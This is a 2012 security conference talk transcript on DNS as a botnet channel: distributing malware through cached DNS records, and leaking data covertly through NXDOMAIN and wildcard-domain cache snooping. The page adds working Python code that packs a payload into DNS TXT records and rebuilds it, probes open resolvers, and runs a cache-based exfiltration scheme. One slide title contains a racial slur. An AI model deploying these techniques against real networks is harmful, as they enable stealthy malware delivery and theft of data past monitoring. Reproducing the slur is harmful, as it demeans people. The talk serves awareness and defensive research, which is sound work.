Carlos Díaz and Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]
"DNS: Internet dial-tone". Starting from this premise, and with an eye on the malware distribution method presented in 2011 (Cloud Malware Distribution), we will try to show in a dynamic way the results obtained after several months of work focused on botnet communications, both on the control side and on the information-leak side, with the DNS protocol in the leading role, of course. We will play with three fundamental parameters that have to be balanced:

Level of exposure of the attacker's infrastructure.
Resources and complexity.
Bandwidth of the communication.
The final objective is to raise awareness of the importance of putting the focus on this protocol, as has been done with others. Our results, and the results obtained by security vendors and researchers in recent months, support the position we defend.

Transcript

  • 1. CMD: Look who's talking too. DNS: a botnet dialect.
  • 2. Francisco J. Gómez Rodríguez (fran@7d.es): Computer Engineering (EUI-UPM); Security Research (Telefónica R&D); dig fran.rootedcon.themafia.info TXT. Carlos Díaz Hidalgo (charlie@7d.es): Telecommunications Engineer (ETSIT-UPM), GPEN, GCIH, OPST, ITILF and CCNA; Technology Specialist in Ethical Hacking (Telefónica R&D); dig charlie.rootedcon.themafia.info TXT.
  • 3. Look who's talking too (agenda, styled as a nasal spray label). This presentation contains: one year ago (3 mg); cloud malware distribution (10 mg); DNS is in the air (10 mg); suspicion (8 mg); data leak (10 mg); laboratory (10 mg). 4.4 FL OZ (130 mL). Tamper-evident: do not accept if sealed blister unit has been broken or opened. This package for households without young children.
  • 4. INTRODUCTION
  • 5. One year ago... We talked about DNS and malware. We released Cloud Malware Distribution (CMD): an alternative method for malware distribution using cache DNS services; it uses the client's default DNS settings; the malware source is virtually untraceable.
  • 6. A DNS shot
  • 7. Cloud Malware Distribution in a nutshell: CMD
  • 8. Cloud Malware Distribution. 1. Encoding: split the malware payload into DNS records. 2. Publishing: publish the domain and each record on a public name server. 3. Loading: force an open emitter DNS cache server to store all the records. 4. Downloading: download the records from an infected host (bot). 5. Decoding: rebuild the malware payload from the records. (Diagram: the records 8rjqerkjqet.cmdns.domain.com, ueirytbdosu.cmdns.domain.com, ktqtr53xase.cmdns.domain.com and kzmfzzmfzze.cmdns.domain.com pass from the authoritative server (steps 1-2) through the open emitter DNS (step 3) to the bot (steps 4-5).)
  • 9. Cloud Malware Distribution (I): Encoding & Publishing. From the malware file we create a base32-coded string (8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze...). Then we split the string into DNS-compliant records: 8rjqerkjqet.cmdns.domain.com, ueirytbdosu.cmdns.domain.com, ktqtr53xase.cmdns.domain.com, kzmfzzmfzze.cmdns.domain.com, published on the authoritative DNS (freedns.afraid.org).
  • 10. Cloud Malware Distribution (II): Loading. We upload each DNS record from a malicious DNS to the open emitter. This is done by requesting each record (split[1..n].cmdns.domain.com A?, cmdns.domain.com NS?) from the open emitter DNS, which fetches it from the authoritative server (freedns.afraid.org). Then the server caches each record.
  • 11. Cloud Malware Distribution (III): Downloading. Since the open emitter server has cached all the records, we turn it into the authoritative server for the domain. From now on, the open emitter will resolve all queries for the domain. Thus every DNS server on the Internet can resolve the malware records and bots can get them.
  • 12. Cloud Malware Distribution (IV): Decoding. With all the retrieved records (kzmfzzmfzze, ktqtr53xase, ueirytbdosu, 8rjqerkjqet, reassembled into 8rjqerkjqetueirytbdosuktqtr53xasekzmfzzmfzze...) the bot can rebuild the original file. The bot has now updated its malware file.
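The encode/split/rebuild steps of slides 8-12 as runnable Python. This is an added example written for this page, not the authors' CMD tool: the owner-name scheme (an `<index>.cmdns.<zone>` name whose TXT record carries the chunk, plus a `sum.cmdns.<zone>` SHA-256 record so the bot can verify what it rebuilt) is an assumption; the slides only show the base32 text split across names under cmdns.domain.com. Base32 is the right choice because DNS handles names and many TXT payloads case-insensitively, which base64 would not survive.

```python
"""CMD-style encoding of a payload into DNS records and its reconstruction.

Added example, not the authors' tool. The owner-name scheme
(<index>.cmdns.<zone> with the chunk in a TXT record, plus a sum.cmdns.<zone>
checksum record) is an assumption.
"""
import base64
import hashlib

LABEL_MAX = 63        # RFC 1035: a label is at most 63 octets
NAME_MAX = 253        # RFC 1035: a domain name is at most 253 octets in text form
TXT_STRING_MAX = 255  # one <character-string> inside a TXT RDATA


def encode_payload(payload: bytes, zone: str, chunk_len: int = 48) -> list:
    """Split `payload` into ordered (owner_name, txt_chunk) records.

    base32 (not base64) is used because the text must survive
    case-insensitive DNS handling. The first record carries the SHA-256 of
    the payload so the bot can verify what it rebuilt.
    """
    if not 1 <= chunk_len <= TXT_STRING_MAX:
        raise ValueError("chunk_len must fit in one TXT character-string")
    text = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    chunks = [text[i:i + chunk_len] for i in range(0, len(text), chunk_len)]
    digest = hashlib.sha256(payload).hexdigest()
    records = [(f"sum.cmdns.{zone}", digest)]        # assumed checksum record
    for idx, chunk in enumerate(chunks):
        owner = f"{idx}.cmdns.{zone}"
        if len(owner) > NAME_MAX or any(len(lab) > LABEL_MAX for lab in owner.split(".")):
            raise ValueError(f"owner name does not fit DNS limits: {owner}")
        records.append((owner, chunk))
    return records


def decode_records(records: list) -> bytes:
    """Rebuild the payload from records received in any order; verify the checksum."""
    digest, parts = None, {}
    for owner, txt in records:
        label = owner.split(".")[0]
        if label == "sum":
            digest = txt
        else:
            parts[int(label)] = txt
    if sorted(parts) != list(range(len(parts))):
        raise ValueError("missing chunk(s): the download is incomplete")
    text = "".join(parts[i] for i in range(len(parts))).upper()
    payload = base64.b32decode(text + "=" * (-len(text) % 8))
    if digest is not None and hashlib.sha256(payload).hexdigest() != digest:
        raise ValueError("checksum mismatch: a record was altered or lost")
    return payload


def zone_file_lines(records: list, ttl: int = 604800) -> list:
    """Render the records as zone-file lines; a long TTL keeps them in caches."""
    return [f'{owner}. {ttl} IN TXT "{txt}"' for owner, txt in records]


if __name__ == "__main__":
    sample = b"MZ" + bytes(range(256))          # constructed stand-in for a binary
    recs = encode_payload(sample, "domain.example")
    print("\n".join(zone_file_lines(recs)[:3]), "...")
    assert decode_records(recs) == sample
```

The long TTL on the zone-file lines is what step 3 ("loading") relies on: once an open emitter has fetched these records, it keeps serving them for that TTL even if the original zone disappears.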
  • 13. Own survey: yesterday and today.

                                   February 2011         March 2012
                                   Spain      USA        Spain      USA
        Queried hosts              10,406     10,406     8,217      8,217
        Replying hosts             87.22%     87.39%     87.58%     87.69%
        Open resolvers             76.46%     77.28%     95.45%     82.08%
        Open emitters              57.76%     57.33%     53.78%     53.51%
        Accept +norecurse queries  55.91%     55.49%     87.67%     74.44%
        TTL ≥ 604800               43.05%     42.94%     51.24%     49.32%
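The categories in the survey table come down to two wire-level questions per host: does it answer a recursive query for a foreign name (open resolver), and does it answer a non-recursive query (RD=0, dig's +norecurse) from its cache (open emitter), and with what TTL. The following added example, not the authors' survey code, builds and parses the DNS packets with the standard library only. The category definitions in `classify()` are my reading of the table rows; `fake_reply()` constructs replies so the whole thing runs offline, and `probe()` is the one function that touches the network.

```python
"""Minimal DNS wire-format helpers to reproduce the survey categories above.
Added example, not the authors' code; classify() encodes my reading of the rows.
"""
import socket
import struct

QTYPE = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "TXT": 16}
RCODE = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 4: "NOTIMP", 5: "REFUSED"}
TXID = 0x1234   # fixed for the example; a real tool randomizes it


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, qtype: str = "A", recurse: bool = True, txid: int = TXID) -> bytes:
    """12-byte header (RD is bit 8 of the flags word) followed by one question."""
    flags = 0x0100 if recurse else 0x0000
    return (struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", QTYPE[qtype], 1))


def _read_name(data: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end = [], None
    while True:
        ln = data[off]
        if ln & 0xC0 == 0xC0:                       # pointer to an earlier name
            if end is None:
                end = off + 2
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(data[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), (end if end is not None else off)


def parse_response(data: bytes) -> dict:
    """Header flags plus (name, type, ttl) for each answer-section record."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qd):
        _, off = _read_name(data, off)
        off += 4                                    # QTYPE + QCLASS
    answers = []
    for _ in range(an):
        name, off = _read_name(data, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10 + rdlen
        answers.append((name, rtype, ttl))
    return {"id": txid, "qr": bool(flags & 0x8000), "ra": bool(flags & 0x0080),
            "rcode": RCODE.get(flags & 0xF, str(flags & 0xF)), "records": answers}


def classify(recursive_reply: dict, norecurse_reply: dict) -> dict:
    """Open resolver: answers a recursive query for a foreign name.
    Accepts +norecurse: does not refuse an RD=0 query.
    Open emitter: serves the RD=0 query from its cache, i.e. returns records.
    cached_ttl: TTL seen on that cached answer (the table's TTL >= 604800 row)."""
    rec_ok = recursive_reply["ra"] and recursive_reply["rcode"] == "NOERROR" and recursive_reply["records"]
    nr_ok = norecurse_reply["rcode"] != "REFUSED"
    emitter = nr_ok and bool(norecurse_reply["records"])
    return {"open_resolver": bool(rec_ok), "accepts_norecurse": nr_ok, "open_emitter": emitter,
            "cached_ttl": max((ttl for _, _, ttl in norecurse_reply["records"]), default=None)}


def probe(server: str, name: str, recurse: bool, timeout: float = 2.0) -> dict:
    """Send one UDP query over the network and parse the reply (not used offline)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, recurse=recurse), (server, 53))
        data, _ = s.recvfrom(4096)
    reply = parse_response(data)
    if reply["id"] != TXID:
        raise ValueError("transaction id mismatch")
    return reply


def fake_reply(query: bytes, rcode: int = 0, ttl=None, ip: str = "192.0.2.1") -> bytes:
    """Constructed reply for offline runs: echoes the question, sets QR and RA,
    copies RD from the query and adds one A record when a ttl is given."""
    txid = struct.unpack("!H", query[:2])[0]
    flags = 0x8080 | (query[2] & 0x01) << 8 | rcode
    an = 0 if ttl is None else 1
    body = struct.pack("!HHHHHH", txid, flags, 1, an, 0, 0) + query[12:]
    if an:
        body += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return body
```

To survey a real host, run `probe(host, "www.example.com", True)` and then `probe(host, "www.example.com", False)` against the same name and hand both replies to `classify()`; only query names you are entitled to look up and hosts you are authorised to test.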
  • 14. A quick test... DNSCrypt. "In the same way that SSL turns HTTP web traffic into HTTPS encrypted web traffic, DNSCrypt turns regular DNS traffic into encrypted DNS traffic that is secure from eavesdropping and man-in-the-middle attacks."
  • 15. ... a quick demo. Summary: we can use DNSCrypt and the CMD method still works (DNSCrypt protects the client-to-resolver hop; the cached records are served just the same).
  • 16. DNS: yesterday, today, and tomorrow. DNS IS IN THE AIR
  • 17. Are you talking to me? Let's see something about... DNS as a covert channel; DNS uses in malware communications.
  • 18. DNS as covert channel: OzymanDNS (Kaminsky); Dnscapy; (NSTX) Iodine: uses several RR types (NULL, TXT, CNAME); Dns2tcp & TCP-over-DNS: relay TCP connections; LoopcVPN: one of China Telecom's hotspot nightmares.
  • 19. Are you talking to me? (agenda repeated: DNS as a covert channel; DNS uses in malware communications.)
  • 20. Stateless malware (I): TSPY_ZBOT.SMQH, another modified ZeuS variant seen in the wild, reported in September 2011 by Trend Micro. Data exchange is also now happening over UDP. http://blog.trendmicro.com/another-modified-zeus-variant-seen-in-the-wild/
  • 21. Stateless malware (II): the older version used TCP to exchange configuration files; however, the new version exchanges all data over UDP. http://www.symantec.com/connect/blogs/zeusbotspyeye-p2p-updated-fortifying-botnet
  • 22. Stateless malware (II), same slide with the TCP exchange highlighted.
  • 23. Where there's smoke, there's fire.
  • 24. Feedorbot: uses the DNS protocol. Feedorbot receives encrypted commands from the C&C, encapsulating the data in TXT records, Base64 encoded. http://www.cj2s.de/On-Botnets-that-use-DNS-for-Command-and-Control.pdf
  • 25. Hiloti: through DNS queries Hiloti reports the infected host's status (http://blog.fortinet.com/hiloti-the-botmaster-of-disguise). Example query: 142625.bc7a3d45.01.0AC1FD9D62074E6D9D2889088284DAB5.n.empty.1148.empty.5_1._t_i.ffffffff.explorer_exe.173.rc2.a4h9uploading.com. Although it uses DNS as its control protocol, the bots download update files from "file hosting" servers over HTTP.
  • 26. Morto: from IRC to DNS. Morto, like Feedorbot, uses TXT records to communicate. http://www.symantec.com/connect/blogs/morto-worm-sets-dns-record
  • 27. GATHERING & EVALUATING INFORMATION
  • 28. Gathering & evaluating information (I): http://www.wombat-project.eu/ ; http://exposure.iseclab.org/index.html
  • 29. Gathering & evaluating information (II): https://dnsdb.isc.org/#Home ; http://www.webboar.com
  • 30. Gathering & evaluating information (III): don't forget the classics: http://www.robtex.com/
  • 31. Learned at #Rooted2012: http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/
  • 32. Sometimes... I see dead people. September 2011 (Top 10 malicious domains).
  • 33. Scratch & Win
  • 34. Ten Little Niggers (Agatha Christie's original title). http://www.webboar.com/ip/67.15.149.70/ : 25 domain(s) on IP address 67.15.149.70: azxdf.com, civiticle0.com, morewallfalls7.com, mjuyh.com, ckubf.com, okjyu.com, hjuyv.com, djhbw.com, orn2hcb.com, plokm.com, himovingto8.com, qlovg.com, nbgtr.com, hiuxd.com, quilution2.com, vcxde.com, liunj.com, uncdt.com, asljd.com, loijm.com, xvfar.com, brutillor5.com, mjrth.com, zscdw.com, zukamosion3.com.
  • 35. Sometimes... I see dead people.
  • 36. CMD could be alive!
  • 37. DATA LEAK OVER DNS
  • 38. DATA LEAK OVER DNS (section slide repeated)
  • 39. Traditional data leak using DNS (diagram). The bot (1) queries DataLeakRecord1.[OUTPUT_DOMAIN], DataLeakRecord2.[OUTPUT_DOMAIN], ... through a cache DNS (public or private), which (2) forwards them to the DNS authoritative server for OUTPUT_DOMAIN, where the attacker reads the names.
  • 40. Using a DNS reflector (diagram). (1) The bot queries Data1.[PUBLICATION_DOMAIN] through a cache DNS (public or private); (2) the authoritative server for PUBLICATION_DOMAIN is an open emitter + cache that was loaded with CMD ("force data leak upload", steps 3-4) with records Data1, Data2, ... each mapping Data_n to DataLeakRecord_n.[OUTPUT_DOMAIN]; (5) the resulting lookup of DataLeakRecord1.[OUTPUT_DOMAIN] reaches the DNS authoritative server for OUTPUT_DOMAIN, where the attacker collects the leak.
  • 41. DNS reflector (demo)
  • 42. Using fast-flux DNS reflectors (diagram): the same scheme as slide 40, with PUBLICATION_DOMAIN served by fast-flux reflectors.
  • 43. Data leak using NXDOMAIN responses. NXDOMAIN responses are cached: negative caching is useful. TTL value: the SOA minimum field is used as the negative (NXDOMAIN) caching time (defined in RFC 2308). Other queries may reuse parts of the lookup (quick response).
  • 44. Caching NXDOMAIN responses (I) (dig output)
  • 45. Caching NXDOMAIN responses (II) (dig output)
  • 46. Caching NXDOMAIN responses (III) (dig output)
  • 47. Data leak with "dig": watch RCODE, TTL and QUERY TIME.
  • 48. Leak recovery with "dig" (I): TTL < 86400, QUERY TIME < 300 msec.
  • 49. Leak recovery with "dig" (II): TTL = 86400, QUERY TIME approx. 300 msec. It is not a good method for recovery! (The full SOA-minimum TTL and the round-trip time show that the probe itself fetched the entry from the authoritative server, polluting the cache.)
  • 50. Leak recovery with "dig" (III): TTL < 86400, QUERY TIME < 300 msec.
  • 51. Leak recovery with "dig" (IV): RCODE ≠ NXDOMAIN, QUERY TIME < 300 msec. It is the preferred method for recovery! (A non-recursive probe for a name that is not cached comes back fast, without NXDOMAIN and without touching the authoritative server, so a miss is distinguishable from a hit with no side effects.)
  • 52. Data leak using NXDOMAIN responses (diagram). The bot (1) queries dataleakrecord1.[OUTPUT_DOMAIN], ... at a DNS (open emitter + cache), which (2) asks the DNS authoritative server for OUTPUT_DOMAIN and caches the NXDOMAIN answer.
  • 53. Data leak using NXDOMAIN responses (diagram, continued). (3) The collector then sends +norecurse queries for candidate names (a.[OUTPUT_DOMAIN], b.[OUTPUT_DOMAIN], ..., z.[OUTPUT_DOMAIN], 1.[OUTPUT_DOMAIN], a1.[OUTPUT_DOMAIN], ...) and reads dataleakrecord1 back from the responses: RCODE? TTL value? Query time?
  • 54. NXDOMAIN (demo)
  • 55. Data leak using "nice" domains. There are authoritative DNS servers that simply point all unknown DNS queries to a single IP address, with a minimum TTL on the order of 1-7 days. Where can I find them? Alexa "Top Sites" (http://www.alexa.com/topsites): inbox.com, imgur.com, motherless.com, wikia.com, wikispaces.com, pbworks.com, ...
  • 56. Caching 'nice' responses (I) (dig output)
  • 57. Caching 'nice' responses (II) (dig output)
  • 58. Data leak using 'nice' domains (diagram): as in slide 52, but the authoritative server for OUTPUT_DOMAIN is a 'nice' domain that answers every name.
  • 59. Data leak using 'nice' domains (diagram, continued). (3) The collector probes with +norecurse queries and checks the ANSWER SECTION and the TTL value.
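The leak of slides 43-59 in one offline simulation, covering both the NXDOMAIN variant (slides 43-54) and the 'nice' wildcard-domain variant (slides 55-59). This is an added example, not the authors' tooling: the resolver model, the name scheme `<index>-<half>-<nibble>.<zone>` (two names per byte, which is where the "2 queries/B" upload cost in the conclusions table comes from) and the TTL constants are assumptions. The bot plants one cache entry per nibble with recursive queries; the collector later sends RD=0 probes for the 16 candidate names of each nibble and applies the slide 51 criterion: a cached NXDOMAIN (TTL already counting down) or, for a 'nice' domain, a cached positive answer is a hit, while NOERROR with no data is a miss that never reaches the authoritative server.

```python
"""Cache-snooping data leak over an open emitter, NXDOMAIN and 'nice' variants.
Added example, not the authors' tooling; resolver model and name scheme assumed.
"""
from dataclasses import dataclass, field

SOA_MINIMUM = 86400       # negative-caching TTL of OUTPUT_DOMAIN (RFC 2308)
WILDCARD_TTL = 604800     # positive TTL of a 'nice' wildcard domain (slide 55: 1-7 days)


@dataclass
class Authoritative:
    """Authoritative server for the zone. With wildcard_ip it is a 'nice'
    domain answering every name with one address; otherwise every unknown
    name is NXDOMAIN."""
    zone: str
    wildcard_ip: str = None
    queries_seen: int = 0

    def answer(self, name: str):
        self.queries_seen += 1
        if self.wildcard_ip:
            return "NOERROR", WILDCARD_TTL, self.wildcard_ip
        return "NXDOMAIN", SOA_MINIMUM, None


@dataclass
class OpenEmitterCache:
    """Recursive cache that also answers RD=0 queries from its cache (an open emitter)."""
    auth: Authoritative
    now: int = 0
    cache: dict = field(default_factory=dict)   # name -> (rcode, expires_at, rdata)

    def query(self, name: str, recurse: bool) -> dict:
        entry = self.cache.get(name)
        if entry and entry[1] > self.now:
            rcode, expires, rdata = entry
            return {"rcode": rcode, "ttl": expires - self.now, "rdata": rdata}
        if not recurse:
            # Nothing cached and the client asked not to recurse: a referral,
            # NOERROR with an empty answer section and no upstream traffic.
            return {"rcode": "NOERROR", "ttl": None, "rdata": None}
        rcode, ttl, rdata = self.auth.answer(name)
        self.cache[name] = (rcode, self.now + ttl, rdata)
        return {"rcode": rcode, "ttl": ttl, "rdata": rdata}


def leak_name(index: int, half: int, nibble: int, zone: str) -> str:
    """Assumed naming scheme: one name per nibble of each byte."""
    return f"{index}-{half}-{nibble:x}.{zone}"


def upload(cache: OpenEmitterCache, data: bytes, zone: str) -> int:
    """Bot side: one recursive query per nibble plants one cache entry per nibble."""
    count = 0
    for i, byte in enumerate(data):
        for half, nibble in enumerate((byte >> 4, byte & 0x0F)):
            cache.query(leak_name(i, half, nibble, zone), recurse=True)
            count += 1
    return count


def is_cache_hit(reply: dict) -> bool:
    """Slide 51 criterion for an RD=0 probe: cached NXDOMAIN, or (for a 'nice'
    domain) a cached positive answer. A miss is NOERROR with no data."""
    return reply["rcode"] == "NXDOMAIN" or reply["rdata"] is not None


def download(cache: OpenEmitterCache, length: int, zone: str):
    """Collector side: probe the 16 candidate names of every nibble with RD=0
    until one is served from the cache. Returns (data, probes_sent)."""
    out, probes = bytearray(), 0
    for i in range(length):
        value = 0
        for half in (0, 1):
            for nibble in range(16):
                probes += 1
                if is_cache_hit(cache.query(leak_name(i, half, nibble, zone), recurse=False)):
                    break
            else:
                raise LookupError(f"byte {i}, half {half}: no cached candidate (expired?)")
            value = (value << 4) | nibble
        out.append(value)
    return bytes(out), probes


if __name__ == "__main__":
    auth = Authoritative("output.example")
    emitter = OpenEmitterCache(auth)
    secret = b"RootedCON 2012"                       # constructed sample
    upload(emitter, secret, "output.example")
    emitter.now += 600                               # collector comes by later
    data, probes = download(emitter, len(secret), "output.example")
    print(data, probes, "probes;", auth.queries_seen, "upstream queries")
```

Two things the simulation makes visible: the authoritative server only ever sees the bot's upload queries, never the collector's probes, which is the "does not expose cybercrime infrastructure" column of the conclusions table; and recovery fails once the negative-cache TTL has run out, so the SOA minimum (or the wildcard TTL) bounds how long the dead drop stays readable.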
  • 60. Conclusions: data leak.

        Method                          Uses client     Upload queries  Exposes cybercrime  Download queries  Score
                                        default DNS     needed          infrastructure      needed            (0-10)
        Traditional DNS tunneling       YES             2 queries/kB    YES                 -                 5
        Using fast-flux DNS reflectors  YES             2 queries/kB    YES                 2 queries/kB      4
        Using NXDOMAIN responses        NO              2 queries/B     NO                  20 queries/B      2
        Using "nice" domains            NO              2 queries/B     NO                  20 queries/B      6

  • 61. ToDo: Improvement++. Data leak using 'nice' domains, but remembering that it must use the client's default DNS settings. Maybe we can use third-party resources... (once again): use misconfigured DNS (proxy DNS, cache DNS, authoritative server, ...), e.g. ones that ignore the "+norecurse" flag, have "minimal-responses" configured, etc. Result: untraceable data leaks.
  • 62. Harder than finding a needle in a haystack!
  • 63. Are we infected? LABORATORY
  • 64. Making the lab. We need a "real" threat... but we are "ethical"... and we are not developers... Searching...
  • 65. And the winner is... Flu: written in C# and PHP; GNU/GPL; geared to building botnets; HTTP communication.
  • 66. How Flu works: the Flu server shares an XML commands file; infected hosts get the XML file through an HTTP request (Flu server → HTTP → Flu infected host).
  • 67. Flu and CMD: we use CMD to distribute the XML commands file. Our dream: Flu becomes a stateless Trojan; then we'll have a stateless-Trojan GPL botnet. HTTP/TCP: 1 GET, 11 packets, 1 connection, versus DNS/UDP: 1 query, 2 packets, 0 connections (Flu DNS → open emitter DNS → Flu infected host).
  • 68. Flu and CMD: server. PHP 5.3.0 or higher required. Three steps: 1. create the domain.db file (external lib: Tar.php); 2. load the XML file into the DNS server (native lib); 3. download data from the infected host (native lib).
  • 69. Flu and CMD: third party. ISC BIND; FreeDNS.afraid.org; HE free DNS service; misconfigured DNS server (open emitter).
  • 70. Flu and CMD: third party (same slide repeated).
  • 71. Flu and CMD: client. We use the ARSoft.Tools.Net library. Without GUI changes: we use domainload to leak data; we use domaindownload to get the XML file.
  • 72. Flu and CMD: how it works (I). XML2DNS → LOADXML → DOWNLOADXML (Flu DNS → open emitter DNS → Flu infected host).
  • 73. Flu and CMD: how it works (II). How does Flu call back? NXDOMAIN can: track new bots. NXDOMAIN can't: send huge files. (Diagram: Flu C&C DNS server ← NXDOMAIN query / NOERROR → open emitter DNS ← NXDOMAIN query / NOERROR → Flu infected host.)
  • 74. Flu and CMD: how it works (II), continued. 1. How does Flu call back? NXDOMAIN can track new bots but can't send huge files. 2. Then... we need to expose a DNS server (Flu DNS ← cache DNS ← Flu infected host).
  • 75. Flu and CMD: demo.
  • 76. Conclusions. DNS is a botnet dialect... one year ago DNS was a possibility, today it could be a real threat. Data leak using DNS needs improvement... but it is work in progress. Malware needs to communicate undetected, and IDS want to detect malware: both must be looking at the same thing... DNS. Don't forget the DNS protocol.
  • 77. Questions? Who invented RootedCON? Pérez the mouse. RootedCON is your parents. Santa. The Three Magic Kings.
  • 78. References:
        http://code.kryo.se/iodine/
        http://dns.measurement-factory.com/
        http://darkwing.uoregon.edu/~joe/secprof10-dns/secprof10-dns.pdf
        http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Kaminsky.pdf
        http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-kaminsky/bh-us-04-kaminsky.ppt
        http://www.pcworld.com/article/220024/feds_accidentally_seize_84000_innocent_domains_link_them_with_child_porn.html
        http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf
        http://www.secdev.org/projects/scapy/
        https://www.isc.org/software/bind/documentation/arm95#man.dig
        http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl
        http://hakin9.org/magazine/1652-mobile-malware-the-new-cyber-threat
        http://www.ietf.org/rfc/rfc{1033,1034,1035,1183,2181}.txt
        http://tools.ietf.org/id/draft-cmd-prevent-malware-dns-distribute-00.txt
        http://www.wombat-project.eu/
        http://exposure.iseclab.org/index.html
        https://dnsdb.isc.org/#Home
        http://www.webboar.com
        https://dns.he.net/
        http://www.flu-project.com/
        http://arsofttoolsnet.codeplex.com/
  • 79. Thanks for your time! @{Hlexpired,ffranz}, {charlie,fran}@7d.es
